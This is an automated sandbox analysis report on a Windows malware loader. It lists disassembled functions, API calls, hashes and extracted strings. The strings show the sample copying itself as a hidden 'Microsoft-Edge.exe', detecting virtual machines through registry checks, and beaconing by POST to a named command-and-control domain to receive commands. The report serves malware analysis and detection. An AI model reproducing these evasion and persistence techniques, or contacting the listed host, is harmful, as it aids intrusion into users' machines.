                                                                                                                                                                  control_flow_graph 217 401b3f-401b94 call 404470 221 401bc5-401bda call 4043c0 217->221 222 401b96-401bc3 fwrite 217->222 226 401c29-401c3c CloseHandle 221->226 227 401bdc-401bf9 221->227 228 401c42-401c4a 222->228 226->228 230 401c12-401c20 call 4043b8 227->230 231 401bfb-401c04 227->231 234 401c25-401c27 230->234 231->230 232 401c06-401c10 231->232 232->226 234->226 234->227
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Error create process print., xrefs: 00401BB2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandlefwrite
                                                                                                                                                                  • String ID: Error create process print.
                                                                                                                                                                  • API String ID: 2559456001-1636502906
                                                                                                                                                                  • Opcode ID: 5a356374c23357b474d64b55516b9b8d47a67ff271d39c417316de58009ac1b4
                                                                                                                                                                  • Instruction ID: 160031cb5352d55d0a049487c33501e703d88c20ecdfb6c2b1e18860d78dcea4
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a356374c23357b474d64b55516b9b8d47a67ff271d39c417316de58009ac1b4
                                                                                                                                                                  • Instruction Fuzzy Hash: 4921E771750B858DEB209FA6EC543E92365F744798F40013ACB1CABBA9EF38CA45C758
                                                                                                                                                                  Function 00401FDE Relevance: 54.4, APIs: 15, Strings: 16, Instructions: 130stringregistryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strncpy$strstr$QueryValue$CloseOpenatoiprintf
                                                                                                                                                                  • String ID: Access Denied$Build$CurrentBuildNumber$CurrentBuildNumber: %s$Microsoft Windows 10$Microsoft Windows 11$Microsoft Windows 7$Microsoft Windows 8$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Unknown $Unknown OS$Windows 10$Windows 7$Windows 8$Windows 8.1
                                                                                                                                                                  • API String ID: 1909651468-1137035884
                                                                                                                                                                  • Opcode ID: c95b2abfa26f166b1f2152bba86730b1d24aeab912c778476510bdf05de0dbc8
                                                                                                                                                                  • Instruction ID: a0a231841afb4618f957893a72e215eef219f5a06bdd2ec8c4e5f5f315850866
                                                                                                                                                                  • Opcode Fuzzy Hash: c95b2abfa26f166b1f2152bba86730b1d24aeab912c778476510bdf05de0dbc8
                                                                                                                                                                  • Instruction Fuzzy Hash: F3512AB6611B40C8EB14DF6AE88039927A0F7887C8F50512BAF1D67BA9EF78C115C748
                                                                                                                                                                  Function 00401C4B Relevance: 36.9, APIs: 12, Strings: 9, Instructions: 127fileCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Error: cant copy file., xrefs: 00401D44
                                                                                                                                                                  • File hidden successfully., xrefs: 00401DF7
                                                                                                                                                                  • File good copied in: %s, xrefs: 00401D5C
                                                                                                                                                                  • Error: failed to open file for setting attributes., xrefs: 00401E88
                                                                                                                                                                  • Error: failed to hide file., xrefs: 00401E21
                                                                                                                                                                  • Error: cant get file path., xrefs: 00401CDF
                                                                                                                                                                  • Microsoft-Edge.exe, xrefs: 00401CF4
                                                                                                                                                                  • Error: failed to get file attributes., xrefs: 00401E4B
                                                                                                                                                                  • Error: cant get file., xrefs: 00401C99
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: fwrite
                                                                                                                                                                  • String ID: Error: cant copy file.$Error: cant get file path.$Error: cant get file.$Error: failed to get file attributes.$Error: failed to hide file.$Error: failed to open file for setting attributes.$File good copied in: %s$File hidden successfully.$Microsoft-Edge.exe
                                                                                                                                                                  • API String ID: 3559309478-1690969207
                                                                                                                                                                  • Opcode ID: 31ea6b0e0d4679e6417db61c00c28e6984b6ded537a5ba6343990c85c88e301a
                                                                                                                                                                  • Instruction ID: 0d97240856d4150d1bbce3dccb48613623e64bff3cac037d7d72e0a46dc880dd
                                                                                                                                                                  • Opcode Fuzzy Hash: 31ea6b0e0d4679e6417db61c00c28e6984b6ded537a5ba6343990c85c88e301a
                                                                                                                                                                  • Instruction Fuzzy Hash: BB510FB0310A4489EB60AB66EC547992360F784788F54013BCF1DAB7F5EF7DCA458788
                                                                                                                                                                  Function 004029E7 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 79filestringCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • puts.MSVCRT ref: 00402A22
                                                                                                                                                                  • setlocale.MSVCRT ref: 00402A41
                                                                                                                                                                  • fwrite.MSVCRT ref: 00402A6E
                                                                                                                                                                  • puts.MSVCRT ref: 00402AA9
                                                                                                                                                                    • Part of subcall function 00401C4B: fwrite.MSVCRT ref: 00401CA0
                                                                                                                                                                    • Part of subcall function 00402218: GetSystemInfo.KERNEL32 ref: 00402241
                                                                                                                                                                    • Part of subcall function 00402218: GlobalMemoryStatusEx.KERNEL32 ref: 0040225E
                                                                                                                                                                    • Part of subcall function 00402218: GetComputerNameA.KERNEL32 ref: 004022CA
                                                                                                                                                                    • Part of subcall function 00402218: RegOpenKeyExA.KERNEL32 ref: 00402352
                                                                                                                                                                    • Part of subcall function 00402218: RegQueryValueExA.KERNEL32 ref: 00402394
                                                                                                                                                                    • Part of subcall function 00402218: RegOpenKeyExA.KERNEL32 ref: 0040240F
                                                                                                                                                                  • printf.MSVCRT ref: 00402AD1
                                                                                                                                                                  • strlen.MSVCRT ref: 00402AF5
                                                                                                                                                                  • free.MSVCRT ref: 00402B33
                                                                                                                                                                  • SleepEx.KERNEL32 ref: 00402B44
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Openfwriteputs$ComputerGlobalInfoMemoryNameQuerySleepStatusSystemValuefreeprintfsetlocalestrlen
                                                                                                                                                                  • String ID: ERROR ENERGY STATUS.$GOOD ENERGY STATUS.$Microsoft-Edge.exe$Need admin privileges. Restarting program...$Russian_Russia.1251
                                                                                                                                                                  • API String ID: 570618865-2989130530
                                                                                                                                                                  • Opcode ID: b0c02647733908f3ed43f4b5f4819f6f79cce6fe36d6c900988b42d52a8968dc
                                                                                                                                                                  • Instruction ID: 188171dc38a9f39a2482fc95cff8ed8cecc5f8f7667dd4d489b5489a0fced0ab
                                                                                                                                                                  • Opcode Fuzzy Hash: b0c02647733908f3ed43f4b5f4819f6f79cce6fe36d6c900988b42d52a8968dc
                                                                                                                                                                  • Instruction Fuzzy Hash: 1C314B60310A4595EB20FB66ED593A92365E79478CF80003B9B0E7B3E5EFBCCA45834D
                                                                                                                                                                  Function 00402760 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 121COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 168 402760-4027ab call 402b88 171 4027b1-4027e2 call 402b90 168->171 172 4029dd-4029e6 168->172 175 4027e8-402866 call 4040c0 call 4040b0 call 402b80 171->175 176 4029ce-4029d8 call 402b98 171->176 184 40286c-4028a7 call 402b60 175->184 185 4029bf-4029c9 call 402b98 175->185 176->172 189 4029b0-4029ba call 402b98 184->189 190 4028ad-4028c3 call 402b68 184->190 185->176 189->185 190->189 194 4028c9-4028d3 190->194 195 4028dd-4028ff call 402b78 194->195 198 4029a2-4029aa 195->198 199 402905-402927 malloc 195->199 198->189 198->195 200 402935-402982 call 404110 call 402b70 199->200 201 402929-402933 199->201 206 402993-40299d free 200->206 207 402984-40298e call 402700 200->207 201->198 206->198 207->206
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: freemalloc
                                                                                                                                                                  • String ID: /iloverussia.php?token=%S$A WinHTTP Example Program/1.0$Final URL: %s$POST$eijfrhegrtbrfcd.online
                                                                                                                                                                  • API String ID: 3061335427-2228553089
                                                                                                                                                                  • Opcode ID: a34cecb6cf9fc084eab04537d76ee1ebedeb2b468dddb7c6cf064be7547877fb
                                                                                                                                                                  • Instruction ID: 6688591eb75c47117cde76ddf5baa49783db9c5feb2c241f654412f5f19611af
                                                                                                                                                                  • Opcode Fuzzy Hash: a34cecb6cf9fc084eab04537d76ee1ebedeb2b468dddb7c6cf064be7547877fb
                                                                                                                                                                  • Instruction Fuzzy Hash: FE511A716017818AEB35DF66E9587DA23A8E344B8CF40112ADA4D6BBD8DFBCC3448744
                                                                                                                                                                  Function 00402700 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 209 402700-402725 call 402607 212 402727-40273a puts call 401e9e 209->212 213 40274d-402754 puts 209->213 216 40273f-40274b free 212->216 215 402759-40275f 213->215 216->215
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • No valid command found in the response., xrefs: 0040274D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: puts$free
                                                                                                                                                                  • String ID: No valid command found in the response.
                                                                                                                                                                  • API String ID: 1067472072-2980825692
                                                                                                                                                                  • Opcode ID: 645667b51ba4701549f401a65558d81603d224556285689a8e5044f58ad6348f
                                                                                                                                                                  • Instruction ID: 01383265a2d4681803a4cc4114b267dcea2e7995ebb67f34bdf8582f11d9381d
                                                                                                                                                                  • Opcode Fuzzy Hash: 645667b51ba4701549f401a65558d81603d224556285689a8e5044f58ad6348f
                                                                                                                                                                  • Instruction Fuzzy Hash: D1F01276B11B10D8EB00EB72E4493AC2774A75478CF40087A9F5D2B7A9DE78C1958304

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 00402D90 Relevance: 12.0, APIs: 8, Instructions: 50COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlCaptureContext.KERNEL32 ref: 00402DA4
                                                                                                                                                                  • RtlLookupFunctionEntry.KERNEL32 ref: 00402DBB
                                                                                                                                                                  • RtlVirtualUnwind.KERNEL32 ref: 00402DFD
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00402E41
                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32 ref: 00402E4E
                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00402E54
                                                                                                                                                                  • TerminateProcess.KERNEL32 ref: 00402E62
                                                                                                                                                                  • abort.MSVCRT ref: 00402E68
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4278921479-0
                                                                                                                                                                  • Opcode ID: 1e2f1e579045fed0aa4db7f78dd159f72cb77928626e21f5b0ebf45983b4390d
                                                                                                                                                                  • Instruction ID: a2dfb62fcd021635a5e8540deebc9b4d933200af3d90c6d2f8b516aefcd08bee
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e2f1e579045fed0aa4db7f78dd159f72cb77928626e21f5b0ebf45983b4390d
                                                                                                                                                                  • Instruction Fuzzy Hash: BA21D0B1611F48E5EB009F65FC8439937A4F708B98F544126DB4E67BA4EF38C165C388
                                                                                                                                                                  Function 00402607 Relevance: 2.6, APIs: 2, Instructions: 62COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: freemalloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3061335427-0
                                                                                                                                                                  • Opcode ID: 2aa251e9edd9c8d5ea52c77049717fbe5cf7f3a2dba64fee5e93c9107e4ea0c2
                                                                                                                                                                  • Instruction ID: c864015200528da4e3a2d7dc0da9566affc9f3e64edacd7b414374e39596ae4e
                                                                                                                                                                  • Opcode Fuzzy Hash: 2aa251e9edd9c8d5ea52c77049717fbe5cf7f3a2dba64fee5e93c9107e4ea0c2
                                                                                                                                                                  • Instruction Fuzzy Hash: 49213E36710B4089EB10CB69E45439E37A4F34478CF104526EE9DABBD8DF7DCAA18744
                                                                                                                                                                  Function 00402559 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: malloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2803490479-0
                                                                                                                                                                  • Opcode ID: bf4f274fc83106b92a7499a08eb9e5cf296d111f5af10154b3a0cf0c9927c73c
                                                                                                                                                                  • Instruction ID: 01c02879a7863bb62acf05a2ef87deb145531d320b57ade11c100b29236f21a1
                                                                                                                                                                  • Opcode Fuzzy Hash: bf4f274fc83106b92a7499a08eb9e5cf296d111f5af10154b3a0cf0c9927c73c
                                                                                                                                                                  • Instruction Fuzzy Hash: 99111671B00B0499EB10CB66E85439D27B4F75878CF004476EE5DA7B98DF79C6918348
                                                                                                                                                                  Function 00401550 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c4a3982be4225abc516490ced92af6daaa1c1d04572ec27a702a85e770645710
                                                                                                                                                                  • Instruction ID: dffc5cefb6737f9c2a3fc77ba6fc29a88c26a929add2b396efdfb6a473b8af1d
                                                                                                                                                                  • Opcode Fuzzy Hash: c4a3982be4225abc516490ced92af6daaa1c1d04572ec27a702a85e770645710
                                                                                                                                                                  • Instruction Fuzzy Hash: E0113DA27146809DF700CBA5D85434F3BB0A3457ACF044658DF6C6BBE9DB7EC6048B94
                                                                                                                                                                  Function 004018BF Relevance: 31.6, APIs: 5, Strings: 13, Instructions: 107stringCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 240 4018bf-40195a 242 40195c-4019a4 240->242 243 4019ad-401a18 240->243 242->243 246 401a68-401a81 strstr 243->246 247 401a1a-401a5f 243->247 248 401aa0-401ab6 strstr 246->248 249 401a83-401a9e printf 246->249 247->246 252 401ad2-401ade puts 248->252 253 401ab8-401ad0 printf 248->253 251 401ae3-401aec 249->251 252->251 253->251
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: printfstrstr$puts
                                                                                                                                                                  • String ID: HARDWARE\DESCRIPTION\System\BIOS$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Model$No 'virt' found in processor name or system model.$Processo$Processor name contains 'virt': %s$ProcessorNameString$System model contains 'virt': %s$SystemProductName$Unknown $Unknown $Virt$virt
                                                                                                                                                                  • API String ID: 2391528766-1360121679
                                                                                                                                                                  • Opcode ID: 2926720af0253c7b4b37213cf284bd72808155d13c3d23a0a06b12bc29e88681
                                                                                                                                                                  • Instruction ID: c84feffc46202db78572020bf7a21f7b525b667a30b23df085d1122e3254eb81
                                                                                                                                                                  • Opcode Fuzzy Hash: 2926720af0253c7b4b37213cf284bd72808155d13c3d23a0a06b12bc29e88681
                                                                                                                                                                  • Instruction Fuzzy Hash: 26512DB2311B8498EB20CB66EC407D933A5F748788F80412ADB5D5BBA9EF7DC254C748
                                                                                                                                                                  Function 004032E0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 283memoryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 254 4032e0-403300 255 403302-403312 254->255 256 403313-40336a call 403e30 call 404070 254->256 256->255 261 40336c-403372 256->261 262 403440-403442 261->262 263 403378-40337a 261->263 264 403380-403383 262->264 265 403448-40344d 262->265 263->264 266 403424-403429 263->266 264->255 267 403389-4033a8 264->267 265->264 268 403453-403459 265->268 266->264 269 40342f-403434 266->269 270 4033b4-4033d5 call 4030e0 267->270 271 40358e-4035ab call 4044b0 268->271 272 40345f-40347b 268->272 269->268 273 403436-40343d 269->273 284 4033b0 270->284 285 4033d7-4033e8 270->285 286 403610-403615 271->286 287 4035ad-4035b2 271->287 274 4034c5-4034da 272->274 275 40347d 272->275 273->262 280 403482 274->280 281 4034dc-40350d call 4030e0 274->281 275->255 282 403540-403543 280->282 283 403488-40348b 280->283 311 4034b8-4034bf 281->311 289 403545-403575 call 4030e0 282->289 290 40357a-403589 call 4044b0 282->290 291 403510-40353a call 4030e0 283->291 292 403491-403494 283->292 284->270 285->255 295 4033ee 285->295 293 4036d0-4036e0 call 4040f0 286->293 294 40361b 286->294 296 4035b4-4035b9 287->296 297 40362f-40363f signal 287->297 289->311 290->271 291->311 292->290 302 40349a-4034b3 call 4030e0 292->302 307 403641-403644 293->307 328 4036e6-4036f7 signal 293->328 303 403654-403659 294->303 304 40361d-403622 294->304 305 4033f0-403400 295->305 309 4036c4-4036ca 296->309 310 4035bf 296->310 306 4036b0-4036bf signal call 4030b0 297->306 297->307 302->311 303->309 312 40365b-403660 303->312 304->309 322 403628-40362d 304->322 315 403410-40341d 305->315 316 403402-40340d VirtualProtect 305->316 306->309 323 403646-403653 307->323 324 40369e-4036a7 307->324 319 403690-403695 310->319 320 4035c5-4035ca 310->320 311->274 311->285 312->324 325 403662-403672 signal 312->325 315->305 327 40341f 315->327 316->315 319->325 326 403697-40369c 319->326 320->309 329 4035d0-4035d5 320->329 322->297 322->324 330 403700-403711 signal 325->330 331 403678-40367b 325->331 326->309 326->324 327->255 332 403603-403607 328->332 329->324 333 4035db-4035eb signal 329->333 330->332 335 403681-40368e 331->335 336 403736-40373b 331->336 337 403720-403731 signal 333->337 338 4035f1-4035f4 333->338 336->332 337->332 338->336 339 4035fa-403601 338->339 339->332
                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualProtect.KERNEL32(0040A610,00007FFE2167ADA0,?,?,?,00000001,0040124C), ref: 0040340D
                                                                                                                                                                  Strings
                                                                                                                                                                  • Unknown pseudo relocation bit size %d., xrefs: 0040357A
                                                                                                                                                                  • Unknown pseudo relocation protocol version %d., xrefs: 0040358E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
